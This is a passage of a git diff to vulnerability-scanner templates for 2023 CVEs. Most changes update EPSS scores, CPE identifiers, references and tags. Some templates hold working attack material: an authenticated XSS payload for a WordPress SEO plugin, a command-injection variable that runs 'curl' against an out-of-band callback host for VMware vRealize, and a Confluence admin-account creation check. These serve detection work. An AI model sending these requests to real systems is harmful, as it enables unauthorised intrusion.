epss-score: 0.01124 - epss-percentile: 0.82821 + epss-score: 0.01587 + epss-percentile: 0.85859 cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index a8a1b009da..ad2c5756a8 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-0563 cwe-id: CWE-79 epss-score: 0.00563 - epss-percentile: 0.74832 + epss-percentile: 0.75116 cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index b46c50a689..c35ae23f05 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-0630 cwe-id: CWE-89 - epss-score: 0.03477 - epss-percentile: 0.90291 + epss-score: 0.0691 + epss-percentile: 0.93142 cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 13f97fc05b..8f76c3fc57 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-0669 cwe-id: CWE-502 - epss-score: 0.96578 - epss-percentile: 0.99443 + epss-score: 0.96823 + epss-percentile: 0.99565 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index c1ddcfb5fd..ee0c2f6eb8 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0942 cwe-id: CWE-79 - epss-score: 0.00374 - epss-percentile: 0.69277 + epss-score: 0.00335 + epss-percentile: 0.67934 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index e8714be571..210fb71ba8 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0948 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29093 + epss-percentile: 0.29433 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 0aff482ab3..66965ecd8d 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0968 cwe-id: CWE-79 - epss-score: 0.00283 - epss-percentile: 0.64533 + epss-score: 0.00216 + epss-percentile: 0.59253 cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index 69e1151000..fdb63b853c 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1020 cwe-id: CWE-89 epss-score: 0.06484 - epss-percentile: 0.92801 + epss-percentile: 0.929 cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 1690769b75..bcf430b00f 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1080 cwe-id: CWE-79 - epss-score: 0.00283 - epss-percentile: 0.64533 + epss-score: 0.00216 + epss-percentile: 0.59253 cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 4555a12e53..cba023b4f0 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1177 cwe-id: CWE-29 - epss-score: 0.01497 - epss-percentile: 0.85238 + epss-score: 0.01267 + epss-percentile: 0.84128 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index 8ef85eb9ab..e89d0de9ad 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1362 cwe-id: CWE-1021 epss-score: 0.00071 - epss-percentile: 0.29038 + epss-percentile: 0.2938 cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index b97f01e3d5..c290cc108f 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1454 cwe-id: CWE-89 - epss-score: 0.03351 - epss-percentile: 0.90132 + epss-score: 0.0391 + epss-percentile: 0.90933 cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 4feab5de92..53a420b9a3 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1496 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.28688 + epss-percentile: 0.29026 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index fde98b4101..35dc5f1178 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1546 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29093 + epss-percentile: 0.29433 cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 15c99c09d5..c839a3ffac 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1671 cwe-id: CWE-77 - epss-score: 0.31251 - epss-percentile: 0.96403 + epss-score: 0.36262 + epss-percentile: 0.96668 cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 15ec6ce3b3..f533b585cc 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1698 cwe-id: CWE-78 - epss-score: 0.59767 - epss-percentile: 0.97319 + epss-score: 0.56393 + epss-percentile: 0.97283 cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index 9f3e49ee50..4e3ab6cdaa 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-1730 cwe-id: CWE-89 epss-score: 0.06484 - epss-percentile: 0.92801 + epss-percentile: 0.929 cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 30954cf750..520585198f 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1835 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29093 + epss-percentile: 0.29433 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 9e09513484..af0de91e6d 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-1890 cwe-id: CWE-79 epss-score: 0.00157 - epss-percentile: 0.5154 + epss-percentile: 0.51923 cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 116207bde0..a2d53a6418 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20073 cwe-id: CWE-434 - epss-score: 0.55732 - epss-percentile: 0.97213 + epss-score: 0.52411 + epss-percentile: 0.97182 cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index adcd654c54..99eac02143 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-2023 cwe-id: CWE-79 epss-score: 0.00171 - epss-percentile: 0.535 + epss-percentile: 0.5389 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 95982b0f2a..2199d40033 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20864 cwe-id: CWE-502 - epss-score: 0.10253 - epss-percentile: 0.94193 + epss-score: 0.18239 + epss-percentile: 0.95586 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 2a6848cd24..1a603bbc34 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20887 cwe-id: CWE-77 - epss-score: 0.96066 - epss-percentile: 0.99263 + epss-score: 0.93282 + epss-percentile: 0.98778 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,7 +29,7 @@ info: product: vrealize_network_insight shodan-query: title:"VMware vRealize Network Insight" fofa-query: title="VMware vRealize Network Insight" - tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast,kev + tags: packetstorm,cve,cve2023,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 1576dc2cbd..486c52d04d 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-20888 cwe-id: CWE-502 - epss-score: 0.0799 - epss-percentile: 0.93437 + epss-score: 0.14273 + epss-percentile: 0.95077 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index eb0cf15ee9..2ee511a79a 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-20889 cwe-id: CWE-77 - epss-score: 0.02153 - epss-percentile: 0.87886 + epss-score: 0.01964 + epss-percentile: 0.87396 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index ce24d89344..aa5feb397a 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-2122 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29286 + epss-percentile: 0.2962 cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 654d46910c..060bdd8105 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2130 cwe-id: CWE-89 - epss-score: 0.01557 - epss-percentile: 0.85582 + epss-score: 0.01504 + epss-percentile: 0.85451 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index f2da8bc885..e7df846166 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-2178 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32486 + epss-percentile: 0.32846 cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index 9bd5b9827b..b5cafbbf9b 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -11,11 +11,20 @@ info: - https://packetstormsecurity.com/files/173725/WordPress-Seo-By-10Web-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2023-2224 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 cve-id: CVE-2023-2224 + cwe-id: CWE-79 + epss-score: 0.00102 + epss-percentile: 0.41332 + cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - tags: cve,cve2023,wp,wordpress,wp-plugin,xss,seo,10web,authenticated + max-request: 3 + vendor: 10web + product: seo + framework: wordpress + tags: wpscan,packetstorm,cve,cve2023,wp,wordpress,wp-plugin,xss,seo,10web,authenticated http: - raw: @@ -25,11 +34,9 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1 Host: {{Hostname}} @@ -37,6 +44,7 @@ http: task=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1 cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index 5f672b1fa7..8781d673b2 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -12,19 +12,21 @@ info: - https://github.com/aeyesec/CVE-2023-22432 - https://nvd.nist.gov/vuln/detail/CVE-2023-22432 - https://jvn.jp/en/jp/JVN78253670/ + - http://web2py.com/ + - http://web2py.com/init/default/download classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-22432 cwe-id: CWE-601 - epss-score: 0.00052 - epss-percentile: 0.18528 + epss-score: 0.04537 + epss-percentile: 0.9155 cpe: cpe:2.3:a:web2py:web2py:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 vendor: web2py product: web2py - verified: true shodan-query: http.favicon.hash:-1680052984 tags: cve,cve2023,web2py,redirect,authenticated diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index 2233bb0300..57ede4e792 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -10,23 +10,25 @@ info: reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20JwtSigKey%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2023-22463.md - https://nvd.nist.gov/vuln/detail/CVE-2023-22463 + - https://github.com/KubeOperator/KubePi/blob/da784f5532ea2495b92708cacb32703bff3a45a3/internal/api/v1/session/session.go#L35 + - https://github.com/KubeOperator/KubePi/commit/3be58b8df5bc05d2343c30371dd5fcf6a9fbbf8b + - https://github.com/KubeOperator/KubePi/releases/tag/v1.6.3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-22463 cwe-id: CWE-798 - epss-score: 0.00065 - epss-percentile: 0.26993 + epss-score: 0.04135 + epss-percentile: 0.91152 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: html:"kubepi" - fofa-query: "kubepi" + max-request: 1 vendor: fit2cloud product: kubepi + shodan-query: html:"kubepi" + fofa-query: "kubepi" tags: cve,cve2023,kubepi,k8s,auth-bypass - variables: name: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index c24c0125b0..127e98b5fb 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22478 cwe-id: CWE-862 - epss-score: 0.01048 - epss-percentile: 0.82159 + epss-score: 0.01764 + epss-percentile: 0.86569 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 15aa673510..2529073d90 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22480 cwe-id: CWE-863,CWE-285 - epss-score: 0.00724 - epss-percentile: 0.78239 + epss-score: 0.0078 + epss-percentile: 0.79378 cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index 65e9fa3444..af35348f25 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -6,25 +6,28 @@ info: severity: critical description: | Atlassian Confluence Data Center and Server contains a privilege escalation vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence. + remediation: | + Update to the latest version of Confluence reference: - https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis - https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html - https://confluence.atlassian.com/kb/faq-for-cve-2023-22515-1295682188.html - https://jira.atlassian.com/browse/CONFSERVER-92475 - https://www.cisa.gov/news-events/alerts/2023/10/05/cisa-adds-three-known-exploited-vulnerabilities-catalog - remediation: | - Update to the latest version of Confluence classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2023-22515 - epss-score: 0.00126 + epss-score: 0.93527 + epss-percentile: 0.98809 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: - fofa-query: app="ATLASSIAN-Confluence" - max-request: 6 verified: true + max-request: 6 + vendor: atlassian + product: confluence_data_center + fofa-query: app="ATLASSIAN-Confluence" tags: cve,cve2023,confluence,auth-bypass,kev,intrusive - variables: username: "{{rand_base(10)}}" password: "{{rand_base(10)}}" @@ -76,4 +79,4 @@ http: - type: dsl dsl: - '"USER: "+ username' - - '"PASS: "+ password' \ No newline at end of file + - '"PASS: "+ password' diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index f1c7ddba27..73ffb10145 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22620 cwe-id: CWE-863 - epss-score: 0.00876 - epss-percentile: 0.80371 + epss-score: 0.01193 + epss-percentile: 0.83582 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index 4d09d119cd..ac363bf47e 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-2272 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29286 + epss-percentile: 0.2962 cpe: cpe:2.3:a:tiempo:tiempo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 573538e395..dbb526c3a3 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-22897 cwe-id: CWE-908 - epss-score: 0.00853 - epss-percentile: 0.80108 + epss-score: 0.01293 + epss-percentile: 0.84303 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 169dac7424..d6f6223ab6 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-23161 cwe-id: CWE-79 epss-score: 0.00104 - epss-percentile: 0.41822 + epss-percentile: 0.42179 cpe: cpe:2.3:a:art_gallery_management_system_project:art_gallery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 01aac8f17f..5eadb1a607 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -12,13 +12,14 @@ info: - https://github.com/Timorlover/CVE-2023-23333 - https://github.com/Mr-xn/CVE-2023-23333 - https://nvd.nist.gov/vuln/detail/CVE-2023-23333 + - http://packetstormsecurity.com/files/174537/SolarView-Compact-6.00-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-23333 cwe-id: CWE-77 - epss-score: 0.63981 - epss-percentile: 0.97411 + epss-score: 0.5361 + epss-percentile: 0.97213 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index 4824530442..d6051d38b1 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23488 cwe-id: CWE-89 - epss-score: 0.02173 - epss-percentile: 0.87935 + epss-score: 0.01884 + epss-percentile: 0.87104 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index f6af90eb2b..bbf387827f 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23489 cwe-id: CWE-89 - epss-score: 0.22685 - epss-percentile: 0.95881 + epss-score: 0.16371 + epss-percentile: 0.95384 cpe: cpe:2.3:a:sandhillsdev:easy_digital_downloads:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index 2b3d06081b..ea4e551cb1 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-23491 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26173 + epss-score: 0.00071 + epss-percentile: 0.29353 cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 99f0ce41f5..f724790636 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -17,13 +17,13 @@ info: cvss-score: 8.8 cve-id: CVE-2023-23492 cwe-id: CWE-89 - epss-score: 0.03531 - epss-percentile: 0.90359 - cpe: cpe:2.3:a:login_with_phone_number_project:login_with_phone_number:*:*:*:*:*:wordpress:*:* + epss-score: 0.04205 + epss-percentile: 0.9121 + cpe: cpe:2.3:a:idehweb:login_with_phone_number:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 - vendor: login_with_phone_number_project + vendor: idehweb product: login_with_phone_number framework: wordpress tags: login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,cve,cve2023 diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 272a4d6022..1b46e2f0f9 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-2356 cwe-id: CWE-23 epss-score: 0.00941 - epss-percentile: 0.81132 + epss-percentile: 0.81346 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index fa678439d2..392216bf8b 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: 